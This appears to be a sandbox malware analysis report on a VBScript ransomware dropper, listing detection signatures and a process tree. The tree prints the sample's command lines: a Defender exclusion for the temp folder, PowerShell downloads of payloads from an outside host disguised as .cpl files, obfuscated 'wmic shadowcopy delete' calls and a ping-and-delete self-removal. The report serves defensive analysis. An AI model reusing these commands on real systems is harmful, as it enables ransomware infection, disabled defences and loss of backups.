Edit tour
Windows
Analysis Report
NOTIFICATION_OF_DEPENDANTS.vbs
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Sigma detected: Delete shadow copy via WMIC
VBScript performs obfuscated calls to suspicious functions
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Deletes shadow drive data (may be related to ransomware)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
May encrypt documents and pictures (Ransomware)
Modifies existing user documents (likely ransomware behavior)
Overwrites Mozilla Firefox settings
Powershell drops PE file
Sigma detected: Control Panel Items
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation STDIN+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Shadow Copies Deletion Using Operating Systems Utilities
Sigma detected: Suspicious Ping/Del Command Combination
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Command Line Path Traversal Evasion Attempt
Sigma detected: PowerShell Web Download
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Stores large binary data to the registry
Classification
- System is w10x64
- wscript.exe (PID: 7336 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\NOTIF ICATION_OF _DEPENDANT S.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 7420 cmdline:
"C:\Window s\System32 \cmd.exe" /c powersh ell start- process ht tps://www. oldmutual. co.za/v3/a ssets/blt0 554f48052b b4620/blt8 b52803ba23 b252a/6674 2ed3b2cbc1 4f42b4434c /Superfund _Beneficia ry_Nominat ion_form.p df MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7428 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7472 cmdline:
powershell start-pro cess https ://www.old mutual.co. za/v3/asse ts/blt0554 f48052bb46 20/blt8b52 803ba23b25 2a/66742ed 3b2cbc14f4 2b4434c/Su perfund_Be neficiary_ Nomination _form.pdf MD5: 04029E121A0CFA5991749937DD22A1D9) - chrome.exe (PID: 7660 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --st art-maximi zed --sing le-argumen t https:// www.oldmut ual.co.za/ v3/assets/ blt0554f48 052bb4620/ blt8b52803 ba23b252a/ 66742ed3b2 cbc14f42b4 434c/Super fund_Benef iciary_Nom ination_fo rm.pdf MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA) - chrome.exe (PID: 7948 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --mojo-pla tform-chan nel-handle =2092 --fi eld-trial- handle=204 0,i,299680 6537159820 788,409896 9065651386 126,262144 --disable -features= Optimizati onGuideMod elDownload ing,Optimi zationHint s,Optimiza tionHintsF etching,Op timization TargetPred iction /pr efetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA) - cmd.exe (PID: 7720 cmdline:
"C:\Window s\System32 \cmd.exe" /c powersh ell -input format non e -outputf ormat none -NonInter active -Co mmand Add- MpPreferen ce -Exclus ionPath $e nv:tmp MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7728 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7772 cmdline:
powershell -inputfor mat none - outputform at none -N onInteract ive -Comma nd Add-MpP reference -Exclusion Path $env: tmp MD5: 04029E121A0CFA5991749937DD22A1D9) - cmd.exe (PID: 8272 cmdline:
"C:\Window s\System32 \cmd.exe" /c powersh ell Invoke -WebReques t -Uri htt ps://kilto ne.top/ste lin/rwcla. cpl -Outfi le $env:tm p\\fjeljie s.cpl MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 8300 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 8352 cmdline:
powershell Invoke-We bRequest - Uri https: //kiltone. top/stelin /rwcla.cpl -Outfile $env:tmp\\ fjeljies.c pl MD5: 04029E121A0CFA5991749937DD22A1D9) - cmd.exe (PID: 8784 cmdline:
"C:\Window s\System32 \cmd.exe" /c control C:\Users\ user\AppDa ta\Local\T emp/fjelji es.cpl MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 8800 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - control.exe (PID: 8928 cmdline:
control C: \Users\use r\AppData\ Local\Temp /fjeljies. cpl MD5: 11C18DBF352D81C9532A8EF442151CB1) - rundll32.exe (PID: 9024 cmdline:
"C:\Window s\system32 \rundll32. exe" Shell 32.dll,Con trol_RunDL L C:\Users \user\AppD ata\Local\ Temp/fjelj ies.cpl MD5: EF3179D498793BF4234F708D3BE28633) - rundll32.exe (PID: 9044 cmdline:
"C:\Window s\SysWOW64 \rundll32. exe" "C:\W indows\Sys WOW64\shel l32.dll",# 44 C:\User s\user\App Data\Local \Temp/fjel jies.cpl MD5: 889B99C52A60DD49227C5E485A016679) - cmd.exe (PID: 3860 cmdline:
cmd /c pow ershell -i nputformat none -out putformat none -NonI nteractive -Command Add-MpPref erence -Ex clusionPat h "$env:tm p" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 1852 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7260 cmdline:
powershell -inputfor mat none - outputform at none -N onInteract ive -Comma nd Add-MpP reference -Exclusion Path "$env :tmp" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - cmd.exe (PID: 3664 cmdline:
cmd /c pow ershell In voke-WebRe quest -Uri https://k iltone.top /stelin/Go sjeufon.cp l -Outfile $env:tmp\ eryy65ty.e xe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 7512 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 4020 cmdline:
powershell Invoke-We bRequest - Uri https: //kiltone. top/stelin /Gosjeufon .cpl -Outf ile $env:t mp\eryy65t y.exe MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - cmd.exe (PID: 2656 cmdline:
cmd /c %te mp%/eryy65 ty.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 8468 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - eryy65ty.exe (PID: 8532 cmdline:
C:\Users\u ser\AppDat a\Local\Te mp/eryy65t y.exe MD5: 9049FABA5517305C44BD5F28398FB6B9) - WMIC.exe (PID: 8236 cmdline:
c:\pwciDK\ pwci\..\.. \Windows\p wci\pwci\. .\..\syste m32\pwci\p wci\..\..\ wbem\pwci\ pwciD\..\. .\wmic.exe shadowcop y delete MD5: C37F2F4F4B3CD128BDABCAEB2266A785) - conhost.exe (PID: 876 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - WMIC.exe (PID: 5528 cmdline:
c:\kXortE\ kXor\..\.. \Windows\k Xor\kXor\. .\..\syste m32\kXor\k Xor\..\..\ wbem\kXor\ kXort\..\. .\wmic.exe shadowcop y delete MD5: C37F2F4F4B3CD128BDABCAEB2266A785) - conhost.exe (PID: 8540 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 8848 cmdline:
cmd.exe /C ping 1.1. 1.1 -n 1 - w 3000 > N ul & Del / f /q "C:\U sers\user\ AppData\Lo cal\Temp\e ryy65ty.ex e" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 8808 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - PING.EXE (PID: 7648 cmdline:
ping 1.1.1 .1 -n 1 -w 3000 MD5: B3624DD758CCECF93A1226CEF252CA12)
- svchost.exe (PID: 7840 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- eryy65ty.exe (PID: 6708 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\eryy65 ty.exe" MD5: 9049FABA5517305C44BD5F28398FB6B9) - WMIC.exe (PID: 2948 cmdline:
c:\OERBWD\ OERB\..\.. \Windows\O ERB\OERB\. .\..\syste m32\OERB\O ERB\..\..\ wbem\OERB\ OERBW\..\. .\wmic.exe shadowcop y delete MD5: C37F2F4F4B3CD128BDABCAEB2266A785) - conhost.exe (PID: 4220 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - WMIC.exe (PID: 5080 cmdline:
c:\gejGMa\ gejG\..\.. \Windows\g ejG\gejG\. .\..\syste m32\gejG\g ejG\..\..\ wbem\gejG\ gejGM\..\. .\wmic.exe shadowcop y delete MD5: C37F2F4F4B3CD128BDABCAEB2266A785) - conhost.exe (PID: 5748 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 4936 cmdline:
cmd.exe /C ping 1.1. 1.1 -n 1 - w 3000 > N ul & Del / f /q "C:\U sers\user\ AppData\Lo cal\Temp\e ryy65ty.ex e" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 1632 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - PING.EXE (PID: 5236 cmdline:
ping 1.1.1 .1 -n 1 -w 3000 MD5: B3624DD758CCECF93A1226CEF252CA12)
- eryy65ty.exe (PID: 4008 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\eryy65 ty.exe" MD5: 9049FABA5517305C44BD5F28398FB6B9) - WMIC.exe (PID: 6980 cmdline:
c:\FnbgXj\ Fnbg\..\.. \Windows\F nbg\Fnbg\. .\..\syste m32\Fnbg\F nbg\..\..\ wbem\Fnbg\ FnbgX\..\. .\wmic.exe shadowcop y delete MD5: C37F2F4F4B3CD128BDABCAEB2266A785) - conhost.exe (PID: 7004 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - WMIC.exe (PID: 4652 cmdline:
c:\gBvDaO\ gBvD\..\.. \Windows\g BvD\gBvD\. .\..\syste m32\gBvD\g BvD\..\..\ wbem\gBvD\ gBvDa\..\. .\wmic.exe shadowcop y delete MD5: C37F2F4F4B3CD128BDABCAEB2266A785) - conhost.exe (PID: 6420 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 6460 cmdline:
cmd.exe /C ping 1.1. 1.1 -n 1 - w 3000 > N ul & Del / f /q "C:\U sers\user\ AppData\Lo cal\Temp\e ryy65ty.ex e" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 7144 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - PING.EXE (PID: 4824 cmdline:
ping 1.1.1 .1 -n 1 -w 3000 MD5: B3624DD758CCECF93A1226CEF252CA12)
- notepad.exe (PID: 7560 cmdline:
"C:\Window s\system32 \NOTEPAD.E XE" C:\Use rs\user\Ap pData\Roam ing\Micros oft\Window s\Start Me nu\Program s\Startup\ Decryptfil es.txt MD5: 27F71B12CB585541885A31BE22F61C83)
- cleanup
⊘No configs have been found
⊘No yara matches
Operating System Destruction |
---|
Source: | Author: Joe Security: |
System Summary |
---|
Source: | Author: Kyaw Min Thein, Furkan Caliskan (@caliskanfurkan_): |
Source: | Author: Jonathan Cheong, oscd.community: |
Source: | Author: Jonathan Cheong, oscd.community: |
Source: | Author: Jonathan Cheong, oscd.community: |
Source: | Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades): |
Source: | Author: Ilya Krestinichev: |
Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: |
Source: | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): |
Source: | Author: Christian Burkard (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: Michael Haag: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: vburov: |
⊘No Suricata rule has matched
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | Integrated Neural Analysis Model: |
Source: | Joe Sandbox ML: |
Source: | HTTP Parser: | ||
Source: | HTTP Parser: | ||
Source: | HTTP Parser: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: |
Software Vulnerabilities |
---|
Source: | Child: |
Networking |
---|
Source: | Process created: |
Source: | IP Address: |
Source: | ASN Name: |
Source: | JA3 fingerprint: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: |
Source: | HTTP traffic detected: |